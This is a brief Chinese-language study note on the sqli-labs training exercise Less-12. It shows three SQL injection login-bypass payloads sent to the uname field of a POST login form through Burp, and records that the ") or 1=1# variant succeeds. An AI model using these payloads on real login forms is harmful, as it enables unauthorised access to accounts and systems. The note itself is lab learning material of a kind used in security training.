Sqli-labs-Less-11(笔记)

Sqli-labs-Less-12与Sqli-labs-Less-11一样也是属于postk类型的,需要使用burp。

查找注入点
当我们使用uname=’ or 1=1#&passwd=admin&submit=Submit
未登录说明不正确
Sqli-labs-Less-12(笔记)

当我们使用uname=" or 1=1#&passwd=admin&submit=Submit
报错并未登录
Sqli-labs-Less-12(笔记)
当我们使用uname=") or 1=1#&passwd=admin&submit=Submit
登录成功说明此处存在注入点
Sqli-labs-Less-12(笔记)

以下步骤与Sqli-labs-Less-11相同 不进行详细叙述 详情见下面链接
链接:Sqli-labs-Less-11

相关文章: